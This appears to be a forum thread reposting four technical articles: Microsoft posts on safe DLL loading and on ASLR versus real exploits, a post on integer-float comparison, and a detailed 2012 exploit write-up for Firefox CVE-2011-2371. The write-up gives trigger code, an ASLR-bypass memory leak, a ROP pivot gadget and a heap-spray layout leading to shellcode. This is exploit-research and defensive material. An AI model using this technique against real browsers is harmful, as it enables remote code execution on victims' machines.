  15. Load Library Safely SRD Blog Author 13 May 2014 11:26 AM Dynamically loading libraries in an application can lead to vulnerabilities if not secured properly. In this blog post we talk about loading a library using LoadLibraryEx() API and make use of options to make it safe. Know the defaults: The library file name passed to LoadLibrary() / LoadLibraryEx() call need not contain an extension. If one is not specified, then the default library file extension, .DLL, is used. As a result of this feature, if a null is passed as library name it tries to load ".DLL" which could be exploited by placing a ".DLL" in the path searched. The library file name passed to LoadLibrary() / LoadLibraryEx() call need not specify a directory path. If one is specified, library is loaded only from the specified path. Otherwise, following default DLL search order is used: The current process image file directory, application directory. The system directory. The 16 bit system directory. The windows directory. The current working directory. The directories listed in the PATH environment variable. Windows maintain a list known DLLs, which are basically a set of system DLLs, that are always guaranteed to load from the system directory when absolute name is specified. DllMain() function within the loaded library is called after loading the library into memory. Control the DLL search order: There are various option to modify the order in which the loading library is searched other than the default search order when absolute name is provided. Some of the APIs that can influence the DLL search order/path by the LoadLibraryEx() are as below: SetDllDirectory() : Adds a directory to the search path used to locate DLLs for the application SetDefaultDllDirectories() : Adds a directory to the process DLL search path AddDllDirectory() : Adds a directory to the process DLL search path RemoveDllDirectory() : Removes a directory that was added to the process DLL search path by using AddDllDirectory() SearchPath() : Searches for a specified file in a specified path SetSearchPathMode() : Sets the per-process mode that the SearchPath() function uses when locating files SetCurrentDirectory() : Changes the current directory for the current process DefaultDllImportSearchPathsAttribute : For managed application use this attribute to specify the paths used to search the DLLs during platform invokes LoadLibraryEx() provide many flags that can be used to alter the default search order. Below table lists most of the flags and also depicts the DLL search order that is followed for each of them. Some of the options even consider the paths set with above mentioned APIs. Table 1: Depicting different options to the LoadLibraryEx and how it affects the DLL search order. Loading library as non-executable: It is not always required to load a library as an executable image. LoadLibraryEx() makes it possible to load a library as a data file, or an image resource, for example. For this purpose, it supports following different options: LOAD_LIBRARY_AS_DATAFILE LOAD_LIBRARY_AS_DATAFILE_EXCLUSIVE LOAD_LIBRARY_AS_IMAGE_RESOURCE DONT_RESOLVE_DLL_REFERENCES These options helps in treating a file as a normal data file rather as an executable module. Loading with this option doesn't call DLLMain() and none of the memory space of the loaded DLL data is marked as executable. Blocking the library from loading: Sometimes it might be required to block a library or block an illegitimate library from loading into an application. Check out following facilities to aid that: AppLocker : AppLocker is a policy based mechanism to block DLLs from loading into applications. These policies can be pushed via group policy. AppLocker can control executables, scripts and installers. When a new DLL loads, a notification is sent to AppLocker to verify that the DLL is allowed to load. AppLocker calls the Application Identity component to calculate the file attributes. It duplicates the existing process token and replaces those Application Identity attributes in the duplicated token with attributes of the loaded DLL. AppLocker then evaluates the policy for this DLL, and the duplicated token is discarded. Depending on the result of this check, the system either continues to load the DLL or stops the process. AppLocker can block the DLL based on path, publisher or file hash. Code Signing Microsoft Authenticode technology can be used to sign the DLL, which is to attach digital signatures to the DLL to guarantee its authenticity and integrity. To summarize our discussion: To ensure secure loading of libraries Use proper DLL search order. Always specify the fully qualified path when the library location is constant. Load as data file when required. Make use of code signing infrastructure or AppLocker. Some common attack vectors we see: Application directory attacks, especially from the temporary internet or download folder perspective. Particularly when the application is an installer, it is a common thing for people to download the installer into default directory and execute from there. Considering attacker can drop malicious file in the default directory can make use of application directory to load the DLLs. Manifest and .local redirection can also be used in this scenario. Loading DLL from memory and also Powershell DLL injection. Which can be used by malwares to keep the loading of a malicious DLL from getting detected. TOCTOU attacks when loading library from remote location. - Swamy Shivaganga Nagaraju, MSRC engineering team Sursa: Load Library Safely - Security Research & Defense - Site Home - TechNet Blogs
  16. swiat 12 Mar 2014 9:13 AM We wrote several times in this blog about the importance of enabling Address Space Layout Randomization mitigation (ASLR) in modern software because it’s a very important defense mechanism that can increase the cost of writing exploits for attackers and in some cases prevent reliable exploitation. In today’s blog, we’ll go through ASLR one more time to show in practice how it can be valuable to mitigate two real exploits seen in the wild and to suggest solutions for programs not equipped with ASLR yet. Born with ASLR ASLR mitigation adds a significant component in exploit development, but we realized that sometimes a single module without ASLR loaded in a program can be enough to compromise all the benefits at once. For this reason recent versions of most popular Microsoft programs were natively developed to enforce ASLR automatically for every module loaded into the process space. In fact Internet Explorer 10/11 and Microsoft Office 2013 are designed to run with full benefits of this mitigation and they enforce ASLR randomization natively without any additional setting on Win7 and above, even for those DLLs not originally compiled with /DYNAMICBASE flag. So, customers using these programs have already a good native protection and they need to take care only of other programs potentially targeted by exploits not using ASLR. ASLR effectiveness in action Given the importance of ASLR, we are taking additional efforts to close gaps when ASLR bypasses arise in security conferences from time to time or when they are found in-the-wild used in targeted attacks. The outcome of this effort is to strength protection also for previous versions of Microsoft OS and browser not able to enforce ASLR natively as IE 10/11 and Office 2013 can do. Some examples of recent updates designed to break well-known ASLR bypasses are showed in the following table. [TABLE=width: 624] [TR] [TD=width: 96] MS BULLETIN [/TD] [TD=width: 192] ASLR BYPASS [/TD] [TD=width: 342] REFERENCE [/TD] [/TR] [TR] [TD=width: 96] MS13-063 [/TD] [TD=width: 192] LdrHotPatchRoutine [/TD] [TD=width: 342] Ref: http://cansecwest.com/slides/2013/DEP-ASLR%20bypass%20without%20ROP-JIT.pdf Reported in Pwn2Own 2013, works only for Win7 x64 [/TD] [/TR] [TR] [TD=width: 96] MS13-106 [/TD] [TD=width: 192] HXDS.DLL (Office 2007/2010) [/TD] [TD=width: 342] Ref: http://www.greyhathacker.net/?p=585 Seen used in-the-wild with IE/Flash exploits (CVE-2013-3893, CVE-2013-1347, CVE-2012-4969, CVE-2012-4792) [/TD] [/TR] [TR] [TD=width: 96] MS14-009 [/TD] [TD=width: 192] VSAVB7RT.DLL (.NET) [/TD] [TD=width: 342] Ref: http://www.greyhathacker.net/?p=585 Seen used in-the-wild with IE exploits (CVE-2013-3893) [/TD] [/TR] [/TABLE] We were glad to see the return of these recent ASLR updates in two recent attacks: the Flash exploit found in February (CVE-2014-0502) in some targeted attacks and a privately reported bug for IE8 (CVE-2014-0324) just patched today. As showed from the code snippets below, the two exploits would not have been effective against fully patched machines with MS13-106 update installed running Vista or above. [TABLE=width: 630] [TR] [TD=width: 362] [/TD] [TD=width: 261] Exploit code for CVE-2014-0502 (Flash) Unsuccessful attempt of ASLR bypass using HXDS.DLL fixed by MS13-106. NOTE: the code attempts also a second ASLR bypass based on Java 1.6.x [/TD] [/TR] [TR] [TD=width: 362] [/TD] [TD=width: 261] Exploit code for CVE-2014-0324 (IE8) Unsuccessful attempt of ASLR bypass using HXDS.DLL fixed by MS13-106. [/TD] [/TR] [/TABLE] Solutions for non-ASLR modules The two exploit codes above shows another important lesson: even if Microsoft libraries are compiled natively with ASLR and even if we work hard to fix known ASLR gaps for our products, there are still opportunities for attackers in using third-party DLLs to tamper the ASLR ecosystem. The example of Java 1.6.x is a well-known case: due to the popularity of this software suite and due to the fact that it loads an old non-ASLR library into the browser (MSVCR71.DLL), it became a very popular vector used in exploits to bypass ASLR. In fact, security researchers are frequently scanning for popular 3rd party libraries not compiled with /DYNAMICBASE that can allow a bypass; the following list is just an example of few common ones. [TABLE=width: 525] [TR] [TD=width: 252] 3rd PARTY ASLR BYPASS [/TD] [TD=width: 378] REFERENCE [/TD] [/TR] [TR] [TD=width: 252] Java 1.6.x (MSVCR71.DLL) [/TD] [TD=width: 378] Very common ASLR bypass used in-the-wild for multiple CVEs NOTE: Java 1.7.x uses MSVCR100.DLL which supports ASLR [/TD] [/TR] [TR] [TD=width: 252] DivX Player 10.0.2 Yahoo Messenger 11.5.0.228 AOL Instant Messenger 7.5.14.8 [/TD] [TD=width: 378] Ref: http://www.greyhathacker.net/?p=756 (not seen in real attacks) [/TD] [/TR] [TR] [TD=width: 252] DropBox [/TD] [TD=width: 378] Ref:http://codeinsecurity.wordpress.com/2013/09/09/installing-dropbox-prepare-to-lose-aslr/ (not seen in real attacks) [/TD] [/TR] [TR] [TD=width: 252] veraport20.Veraport20Ctl Gomtvx.Launcher INIUPDATER.INIUpdaterCtrl [/TD] [TD=width: 378] Ref: KISA report http://boho.or.kr/upload/file/EpF448.pdf (seen in-the-wild with CVE-2013-3893) [/TD] [/TR] [/TABLE] As noted at beginning of this blog, Internet Explorer 10/11 and Office 2013 are not affected by ASLR bypasses introduced by 3rd party modules and plugins. Instead, customers still running older version of Internet Explorer and Office can take advantage of two effective tools that can be used to enforce ASLR mitigation for any module: EMET (Enhanced Mitigation Experience Toolkit): can be used to enable system-wide ASLR or “MandatoryASLR” selectively on any process; “Force ASLR” update KB2639308: makes possible for selected applications to forcibly relocate images not built with /DYNAMICBASE using Image File Execution Options (IFEO) registry keys; Conclusions ASLR bypasses do not represent vulnerabilities, since they have to be combined with a real memory corruption vulnerability in order to allow attackers to create an exploit, however it's nice to see that closing ASLR bypasses can negatively impact the reliability of certain targeted attacks. We encourage all customers to proactively test and deploy the suggested tools when possible, especially for old programs commonly targeted by memory corruption exploits. We expect that attackers will continue increasing their focus and research on more sophisticated ASLR bypasses which rely on disclosure of memory address rather than non-ASLR libraries. - Elia Florio, MSRC Engineering Sursa: When ASLR makes the difference - Security Research & Defense - Site Home - TechNet Blogs
  17. [h=2]The perfect int == float comparison[/h]Just to be clear, this post is not going to be about the float vs. float comparison. Instead, it will be about trying to compare a floating point value with an integer value in an accurate, precise way. It will also be about why just doing int_value == float_value in some languages (C, C++, PHP, and some other) doesn't give you the result you would expect - a problem which I recently stumbled on when trying to fix a certain library I was using. UPDATE: Just to make sure we see it in the same way: this post is about playing with bits and floats just for the sake of playing with bits and floats; it's not something you could or should use in anything serious though UPDATE 2: There were two undefined behaviours pointed out in my code (one, two) - these are now fixed. The problem explained Let's start by demonstrating a the problem by running the following code that compares subsequent integers with a floating point value: float a = 100000000.0f; printf("...99 --> %i\n", a == 99999999); printf("...00 --> %i\n", a == 100000000); printf("...01 --> %i\n", a == 100000001); printf("...02 --> %i\n", a == 100000002); printf("...03 --> %i\n", a == 100000003); printf("...04 --> %i\n", a == 100000004); printf("...05 --> %i\n", a == 100000005); The result: ...99 --> 1 ...00 --> 1 ...01 --> 1 ...02 --> 1 ...03 --> 1 ...04 --> 1 ...05 --> 0 Sadly this was to be expected in the floating point realm. However, while in this world both 99999999 and 100000004 might be equal to 100000000, this is sooo not true for common sense nor standard arithmetic. Let's look at another example - an attempt to sort a collection of numbers by value in PHP: <?php $x = array( 20000000000000002, 20000000000000003, 20000000000000000.0, ); sort($x); foreach ($x as $i) { if (is_float($i)) { printf("%.0f\n", $i); } else { printf("%i\n", $i); } } The "sorted" result (64-bit PHP): > php test.php 20000000000000002 20000000000000000 20000000000000003 Side note: The code above must be executed using 64-bit PHP. The 32-bit PHP has integers limited to 32-bit, so the numbers I used in the example would exceed their limit and would get silently converted to doubles. This results in the following output: 20000000000000000 20000000000000000 20000000000000004 So, what's going on? It all boils down to floats having to little precision for larger integers (this is a good time to look at this and this). For example, the 32-bit float has only 23 bits dedicated to the significand - this means that if an integer value that is getting converted to float needs more than 24 bits (sic!; keep in mind that in floats there is a hardcoded "1" at the top position, which is not present in the bit-level representation) to be represented, it will get truncated - i.e. the least significant bits will be treated as zeroes. In the C-code case above the decimal value 100000001 actually requires 27 bits to be properly represented: 0b101111101011110000100000001 However, since only the leading "1" and following 23-bits will fit inside a float, the "1" at the very end gets truncated. Therefore, this number actually becomes another number: 0b101111101011110000100000000 Which in decimal is 100000000 and therefore is equal to the float constant of 100000000.0f. Same problem exists between 64-bit integers and 64-bit doubles - the latter have only 52 bits dedicated for storing the value. A somewhat amusing side note Actually, it gets even better. Let's re-write the first code shown above (the C one) to use a loop: float a = 100000000.0f; int i; for(i = 100000000 - 5; i <= 100000000 + 5; i++) { printf("%11.1f == %9u --> %i\n", a, i, a == i); } As you can see, there are no big changes. Now let's compile it and run it: >gcc test.c > a 100000000.0 == 99999995 --> 0 100000000.0 == 99999996 --> 0 100000000.0 == 99999997 --> 0 100000000.0 == 99999998 --> 0 100000000.0 == 99999999 --> 0 100000000.0 == 100000000 --> 1 100000000.0 == 100000001 --> 0 100000000.0 == 100000002 --> 0 100000000.0 == 100000003 --> 0 100000000.0 == 100000004 --> 0 100000000.0 == 100000005 --> 0 The result is magically correct! How about we compile it with optimization then? >gcc test.c -O3 > a 100000000.0 == 99999995 --> 0 100000000.0 == 99999996 --> 1 100000000.0 == 99999997 --> 1 100000000.0 == 99999998 --> 1 100000000.0 == 99999999 --> 1 100000000.0 == 100000000 --> 1 100000000.0 == 100000001 --> 1 100000000.0 == 100000002 --> 1 100000000.0 == 100000003 --> 1 100000000.0 == 100000004 --> 1 100000000.0 == 100000005 --> 0 Why is that? Well, in both cases the compiler needs to convert the integer to a float and then compare it with the second float value. This however can be done in two different ways: Option 1: The integer is converted to a floating point value, then is stored in memory as a 32-bit float and then loaded into the FPU for the comparison OR (in case of constants) the integer constant can be converted to a 32-bit float constant at compilation time and then it will be loaded into the FPU for comparison at runtime. Option 2: The integer is directly loaded into the FPU for comparison (using fild FPU instruction or similar). The difference here is related to the FPU internally operating on larger floating point values with more precision (by default it's 80-bits, though you can change this) - so the 32-bit integer isn't truncated on load, as it would happen if it gets converted explicitly to a 32-bit float (which, again, has only 24-bits for the actual value). Which option is selected depends strictly on the compiler - it's mood, version, options used at compilation, etc. The perfect comparison Of course, it's possible to do a perfect comparison. The simplest and most straightforward way is to cast both the int value and the float value to a double before comparing them - double has large enough significand to store all possible 32-bit int values. And for the 64-bit integers you can use the 80-bit long double which has exactly 64 bits dedicated for storing the value (plus the ever-present "1"). But that's too easy. Let's try to do the actual comparison without converting to larger types. This can be done in two ways: the "mathematical" way (or: value-specific way) and the encoding-specific way. Both are presented below. UPDATE 3: Actually there seems to be another way, as pointed out in the comments below and in this reddit post. It does make sense, but I still wonder if there is any counterexample (please note that I'm not saying there is; I'm just saying it never hurts to look for one ;>). The mathematical way We basically do it the other way around - i.e. we try to convert the float to an integer. There are a couple of problems here which we need to deal with: 1. The float value might be bigger than INT_MAX or smaller than INT_MIN. In such case this might happen and we wouldn't be able to catch it after the conversion, so we need to deal with it sooner. 2. The float value might have a non-zero fractional part. This would get truncated when converted to an int (e.g. (int)1.1f is equal to 1) - we don't want this to happen either. The implementation of this method (with some comments) is presented below: bool IntFloatCompare(int i, float f) { // Simple case. if ((float)i != f) return false; // Note: The constant used here CAN be represented as a float. Normally // you would want to use INT_MAX here instead, but that value // *cannot* be represented as a float. const float TooBigForInt = (float)0x80000000u; if (f >= TooBigForInt) { return false; } if (f < -TooBigForInt) { return false; } float ft = truncf(f); if (ft != f) { // Not an integer. return false; } // It should be safe to cast float to integer now. int fi = (int)f; return fi == i; } The encoding-specific way This method relies on decoding the float value from the bit-level representation, checking if it's an integer, checking if it is in range and finally comparing the bits with the integer value. I'll just leave you with the code. If in doubt - refer to this wikipedia page. bool IntFloatCompareBinary(int i, float f) { uint32_t fu32; memcpy(&fu32, &f, 4); uint32_t sign = fu32 >> 31; uint32_t exp = (fu32 >>23) & 0xff; uint32_t frac = fu32 & 0x7fffff; // NaN? Inf? if (exp == 0xff) { return false; } // Subnormal representation? if (exp == 0) { // Check if fraction is 0. If so, it's true if "i" is 0 as well. // Otherwise it's false in all cases. return (frac == 0 && i == 0); } int exp_decoded = (int)exp - 127; // If exponent is negative, the number has a fraction part, which means it's not equal. if (exp_decoded < 0) { return false; } // If exponenta is above or equal to 31, int cannot represent so big numbers. if (exp_decoded > 31) { return false; } // There is one case where exp_decoded equal to 31 makes sens - when float is // equal to INT_MIN, i.e. sign is - and fraction part is 0. if (exp_decoded == 31 && (sign != 1 || frac != 0)) { return false; } // What is left is in range of integer, but still can have a fraction part. // Check if any fraction part will be left. uint32_t value_frac = (frac << exp_decoded) & 0x7fffff; if (value_frac != 0) { return false; } // Check the value. int value = (1 << 23) | frac; int shift_diff = exp_decoded - 23; if (shift_diff <0) { value >>= -shift_diff; } else { value <<= shift_diff; } if (sign) { value = -value; } return i == value; } Summary The above functions can be used for a perfect comparison and they SeemToWork™ (at least on little endian x86). With some more work both functions could be converted to be perfect "less than" comparators which then could be used to fix the PHP sorting example. But... seriously, just cast the integer and float to something that has more precision ;> P.S. Did you know that there are exactly 75'497'471 positive integer values that can be precisely represented as a float? Not a lot for the total of 2'147'483'647 positive integers. Sursa: gynvael.coldwind//vx.log
  18. [h=2]Exploiting CVE-2011-2371 (FF reduceRight) without non-ASLR modules[/h]22/02/2012 pakt CVE-2011-2371 (found by Chris Rohlf and Yan Ivnitskiy) is a bug in Firefox versions <= 4.0.1. It has an interesting property of being a code-exec and an info-leak bug at the same time. Unfortunately, all public exploits targeting this vulnerability rely on non-ASLR modules (like those present in Java). In this post I’ll show how to exploit this vulnerability on Firefox 4.0.1/Window 7, by leaking imagebase of one of Firefox’s modules, thus circumventing ASLR without any additional dependencies. [h=2]The bug[/h] You can see the original bug report with detailed analysis here. To make a long story short, this is the trigger: xyz = new Array; xyz.length = 0x80100000; a = function foo(prev, current, index, array) { current[0] = 0x41424344; } xyz.reduceRight(a,1,2,3); Executing it crashes Firefox: eax=0454f230 ebx=03a63da0 ecx=800fffff edx=01c6f000 esi=0012cd68 edi=0454f208 eip=004f0be1 esp=0012ccd0 ebp=0012cd1c iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 mozjs!JS_FreeArenaPool+0x15e1: 004f0be1 8b14c8 mov edx,dword ptr [eax+ecx*8] ds:0023:04d4f228=???????? eax holds a pointer to “xyz” array and ecx is equal to xyz.length-1. reduceRight visits all elements of given array in reverse order, so if the read @ 004f0be1 succeeds and we won’t crash inside the callback function (foo), JS interpreter will loop the above code with decreasing values in ecx. Value read @ 004f0be1 is passed to foo() as the “current” argument. This means we can trick the JS interpreter into passing random stuff from heap to our javascript callback. Notice we fully control the array’s length, and since ecx is multiplied by 8 (bitshifted left by 3 bits), we can access memory before of after the array, by setting/clearing the 29th bit of length. Neat . During reduceRight(), the interpreter expects jsval_layout unions: http://mxr.mozilla.org/mozilla2.0/source/js/src/jsval.h 274 typedef union jsval_layout 275 { 276 uint64 asBits; 277 struct { 278 union { 279 int32 i32; 280 uint32 u32; 281 JSBool boo; 282 JSString *str; 283 JSObject *obj; 284 void *ptr; 285 JSWhyMagic why; 286 jsuword word; 287 } payload; 288 JSValueTag tag; 289 } s; 290 double asDouble; 291 void *asPtr; 292 } jsval_layout; To be more specific, we are interested in the “payload” struct. Possible values for “tag” are: http://mxr.mozilla.org/mozilla2.0/source/js/src/jsval.h 92 JS_ENUM_HEADER(JSValueType, uint8) 93 { 94 JSVAL_TYPE_DOUBLE = 0x00, 95 JSVAL_TYPE_INT32 = 0x01, 96 JSVAL_TYPE_UNDEFINED = 0x02, 97 JSVAL_TYPE_BOOLEAN = 0x03, 98 JSVAL_TYPE_MAGIC = 0x04, 99 JSVAL_TYPE_STRING = 0x05, 100 JSVAL_TYPE_NULL = 0x06, 101 JSVAL_TYPE_OBJECT = 0x07, ... 119 JS_ENUM_HEADER(JSValueTag, uint32) 120 { 121 JSVAL_TAG_CLEAR = 0xFFFF0000, 122 JSVAL_TAG_INT32 = JSVAL_TAG_CLEAR | JSVAL_TYPE_INT32, 123 JSVAL_TAG_UNDEFINED = JSVAL_TAG_CLEAR | JSVAL_TYPE_UNDEFINED, 124 JSVAL_TAG_STRING = JSVAL_TAG_CLEAR | JSVAL_TYPE_STRING, 125 JSVAL_TAG_BOOLEAN = JSVAL_TAG_CLEAR | JSVAL_TYPE_BOOLEAN, 126 JSVAL_TAG_MAGIC = JSVAL_TAG_CLEAR | JSVAL_TYPE_MAGIC, 127 JSVAL_TAG_NULL = JSVAL_TAG_CLEAR | JSVAL_TYPE_NULL, 128 JSVAL_TAG_OBJECT = JSVAL_TAG_CLEAR | JSVAL_TYPE_OBJECT 129 } JS_ENUM_FOOTER(JSValueTag); Does it mean we can only read first dwords of pairs (d1,d2), where d2=JSVAL_TAG_INT32 or d2=JSVAL_TYPE_DOUBLE? Fortunately for us, no. Observe how the interpreter checks if a jsval_layout is a number: http://mxr.mozilla.org/mozilla2.0/source/js/src/jsval.h 405 static JS_ALWAYS_INLINE JSBool 406 JSVAL_IS_NUMBER_IMPL(jsval_layout l) 407 { 408 JSValueTag tag = l.s.tag; 409 JS_ASSERT(tag != JSVAL_TAG_CLEAR); 410 return (uint32)tag <= (uint32)JSVAL_UPPER_INCL_TAG_OF_NUMBER_SET; So any pair of dwords (d1, d2), with d2<=JSVAL_UPPER_INCL_TAG_OF_NUMBER_SET (which is equal to JSVAL_TAG_INT32) is interpreted as a number. This isn’t the end of good news, check how doubles are recognized: http://mxr.mozilla.org/mozilla2.0/source/js/src/jsval.h 369 static JS_ALWAYS_INLINE JSBool 370 JSVAL_IS_DOUBLE_IMPL(jsval_layout l) 371 { 372 return (uint32)l.s.tag <= (uint32)JSVAL_TAG_CLEAR; 373 } This means that any pair (d1,d2) with d2<=0xffff0000 is interpreted as a double-precision floating point number. It’s a clever way of saving space, since doubles with all bits of the exponent set and nonzero mantissa are NaNs anyway, so rejecting doubles greater than 0xffff 0000 0000 0000 0000 isn’t really a problem — we are just throwing out NaNs. [h=2]Leaking the image base[/h] Knowing that most of values read off the heap are interpreted as doubles in our javascript callback (function foo above), we can use a library like JSPack to decode them to byte sequences. var leak_func = function bleh(prev, current, index, array) { if(typeof current == "number"){ mem.push(current); //decode with JSPack later } count += 1; if(count>=CHUNK_SIZE/8){ throw "lol"; //stop dumping } } Notice that we are verifying the type of “current”. It’s necessary because if we encounter a jsval_value of type OBJECT, manipulating it later will cause an undesired crash. Having a chunk of memory, we still need to comb it for values revealing the image base of mozjs.dll (that’s the module implementing reduceRight). Good candidates are pointers to functions in .code section, or pointers to data structures in .data, but how to find them? After all, they change with every run, because of varying image base. By examining dumped memory manually, I noticed it’s always possible to find a pair of pointers (with fixed RVAs) to .data section, differing by a constant (0×304), so a simple algorithm is to sequentially scan pairs of dwords, check if their difference is 0×304 and use their (known) RVAs to calculate mozjs’ image base (image_base = ptr_va – ptr_rva). It’s a heuristic, but it works 100% of the time . [h=2]Taking control[/h] Assume we are able to pass a controlled jsval_layout with tag=JSVAL_TYPE_OBJECT to our JS callback. Here’s what happens after executing “current[0]=1? if the “payload.ptr” field points to an area filled with \x88: eax=00000001 ebx=00000009 ecx=40000004 edx=00000009 esi=055101b0 edi=88888888 eip=655301a9 esp=0048c2a0 ebp=13801000 iopl=0 ov up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010a06 mozjs!js::mjit::stubs::SetElem$lt;0>+0xf9: 655301a9 8b4764 mov eax,dword ptr [edi+64h] ds:002b:888888ec=???????? 0:000> k ChildEBP RetAddr 0048c308 6543fc4c mozjs!js::mjit::stubs::SetElem<0>+0xf9 [...js\src\methodjit\stubcalls.cpp @ 567] 0048c334 65445d99 mozjs!js::InvokeSessionGuard::invoke+0x13c [...\js\src\jsinterpinlines.h @ 619] 0048c418 65445fa6 mozjs!array_extra+0x3d9 [...\js\src\jsarray.cpp @ 2857] 0048c42c 65485221 mozjs!array_reduceRight+0x16 [...\js\src\jsarray.cpp @ 2932] We are using \x88 as a filler, so that every pointer taken from that area is equal to 0×88888888. Since the highest bit is set (and the pointer points to kernel space), every dereference will cause a crash and we will notice it under a debugger. Using low values, like 0x0c, as a filler during exploit development can make us miss crashes, if 0x0c0c0c0c happens to be mapped . It seems like we can control the value of edi. Let’s see if it’s of any use: 0:000> u eip l10 mozjs!js::mjit::stubs::SetElem<0>+0xf9 [...\js\src\methodjit\stubcalls.cpp @ 567]: 655301a9 8b4764 mov eax,dword ptr [edi+64h] 655301ac 85c0 test eax,eax 655301ae 7505 jne mozjs!js::mjit::stubs::SetElem<0>+0x105 (655301b5) 655301b0 b830bb4965 mov eax,offset mozjs!js_SetProperty (6549bb30) 655301b5 8b54241c mov edx,dword ptr [esp+1Ch] 655301b9 6a00 push 0 655301bb 8d4c2424 lea ecx,[esp+24h] 655301bf 51 push ecx 655301c0 53 push ebx 655301c1 55 push ebp 655301c2 52 push edx 655301c3 ffd0 call eax 655301c5 83c414 add esp,14h 655301c8 85c0 test eax,eax That’s exactly what we need — value from [edi+64h] (edi is controlled) is a function pointer called @ 655301c3. Where does edi value come from? 0:000> u eip-72 l10 mozjs!js::mjit::stubs::SetElem<0>+0x87 [...\js\src\methodjit\stubcalls.cpp @ 552]: 65530137 8b7d04 mov edi,dword ptr [ebp+4] 6553013a 81ffb05f5e65 cmp edi,offset mozjs!js_ArrayClass (655e5fb0) 65530140 8b5c2414 mov ebx,dword ptr [esp+14h] 65530144 7563 jne mozjs!js::mjit::stubs::SetElem<0>+0xf9 (655301a9) edi=[ebp+4], where ebp is equal to payload.ptr in our jsval_layout union. It’s now easy to see how to control EIP. Trigger setElem on a controlled jsval_layout union (by executing “current[0]=1? in the JS callback of reduceRight), with tag=JSVAL_TYPE_OBJECT, and ptr=PTR_TO_CONTROLLED_MEM, where [CONTROLLED_MEM+4]=NEW_EIP. Easy . Since ASLR is not an issue (we already have mozjs’ image base) we can circumvent DEP with return oriented programming. With mona.py it’s very easy to generate a ROP chain that will allocate a RWX memory chunk. From that chunk, we can run our “normal” shellcode, without worrying about DEP. !mona rop -m "mozjs" -rva “-m” restricts search to just mozjs.dll (that’s the only module with known image base) “-rva” generates a chain parametrized by module’s image base. I won’t paste the output, but mona is able to find a chain that uses VirtualAlloc to change memory permissions to RWX. There’s only one problem. In order to use that chain, we need to control the stack. During the call @ 655301c3, we don’t. Fortunately, we do control EBP, which is equal to layout.ptr field in our fake object. First idea is to use any function’s epilogue: mov esp, ebp pop ebp ret as a pivot, but notice that RET will transfer control to an address stored in [ebp+4], and since: 65530137 8b7d04 mov edi,dword ptr [ebp+4] that would mean [ebp+4] has to be a return address and a pointer to a function pointer called later @ 655301c3. We have to modify EBP before copying it to ESP. Noticing that during SetElem, property’s id is passed in EBX as 2*id+1 (when executing “current[id] = …”), it’s easy to pick a good gadget: // 0x68e7a21c, mozjs.dll // found with mona.py ADD EBP,EBX PUSH DS POP EDI POP ESI POP EBX MOV ESP,EBP //(1) POP EBP //(2) RETN This will offset EBP by a controlled ODD value. Unicode chars in JS have two byte chars, so it’s better to have EBP aligned to 2. We can realign ESP by pivoting again with new EBP value popped @ (2) and executing the same gadget from line (1). This is how our fake object has to look like: +------------+ | | 9 13 17 v------------+----------------------------------------------------------------------+ |pivot_va | ptr | 00,new_ebp,mov_esp_ebp,00 | new_ebp2 | ROP ... normal shellcode ... +-----------------------+-----------------------------------------------------------+ 0 4 8 | 18 22 | ^ | | +-------------------+ pivot_va – address of the gadget above new_ebp – value popped at (2) used to realign the stack to 2 mov_esp_ebp – address of (1) new_ebp2 – new value of EBP after executing (2) for the second time, not used ROP – generated ROP chain changing memory perms normal shellcode – message box shellcode by Skylined [h=2]Spraying[/h] Here’s a nice diagram (asciiflow FTW) describing how we are going to arrange (or attempt to arrange) things in memory: low addresses +---------------------+ +-------+ ptr | 0xffff0007 | ^ | +---------------------| | | | | | | | . | | | | . | | | | . | | | +---------------------| | half1 | +----+ ptr | 0xffff0007 | | | | +---------------------| | | | | . | | | | | . | | | | | . | | | | | | v | | +-----end of half1----+ | | | | ^ | | | | | | | | | | margin of | | | . | | error | | | . | | | | +---------------------+ v +--|---> fake object | | +--^------------------+ | | | . | | | | . | +-----+ | | | | | +---------------------+ high addresses Our spray will consist of two regions. First one will be filled with jsval_layout unions, with tag=0xffff0007 (JSVAL_TYPE_OBJECT) and ptr pointing to the second region, filled with fake objects described above. If you run the PoC exploit on Windows XP, this is how (most likely) the heap is going to look like: Zooming into of the 1MB chunks: Notice how our payload is aligned to 4KB boundary. This is because of how the spray is implemented: unicode strings are stored in an array. Beginning of the array is used to store metadata, and the actual data starts @ +4KB. It’s also useful to note that older versions of FF have a bug related to rounding allocation sizes and, in effect, allocating too much memory for objects (including strings), so instead of nicely aligned strings in array, we will get strings interleaved with chunks containing NULL bytes (I’ll explain why this isn’t a problem in a sec.). This is how the fake objects from the second part of spray look like: Four NOPs at the bottom mark the end of mona’s ROP chain. [h=2]Putting it all together[/h] Leak mozjs’ image base, as described above. Spray the heap with JS, as described above. Note where the spray starts in memory, across different OSes. Different versions of the exploit should use OS-specific constants for calculating array’s length used in reduceRight(). Calculate the length of the array (xyz in the trigger PoC) so that the first dereference should happen in the middle of first half of the spray. Aiming at the middle gives us the biggest possible margin of error — if the spray’s starting address deviates from expected value by less than size/2, it shouldn’t affect our exploit. Trigger the bug. Inside JS callback, trigger SetElem, by executing “current[4]=1?. In case of a JS exception (TypeError: current is undefined), change array’s length and continue. These exceptions are caused by NULL areas between strings. Encountering them isn’t fatal, because the JS interpreter sees them as “undefined” values and throws us a JS exception, instead of crashing . See a nice messagebox, confirming success [h=2]Limitations[/h] PoC exploit assumes (like all other public exploits for this bug) that the heap is not polluted by previous allocations. This is a bit unrealistic, because the most common “use-case” is that the victim clicks a link leading to the exploit, meaning the browser is already running and most likely has many tabs already opened. In that situation our spray probably won’t be a continuous chunk of memory, which will lead to problems (crashes). Assuming that the PoC is the first and only page opened in Firefox, probability of success (running shellcode) depends on how long we need to search for mozjs’ image base. The longer it takes, the more trash gets accumulated on the heap, resulting in more “discontinuities” in the spray region. Get the PoC here. Sursa: Exploiting CVE-2011-2371 (FF reduceRight) without non-ASLR modules | GDTR
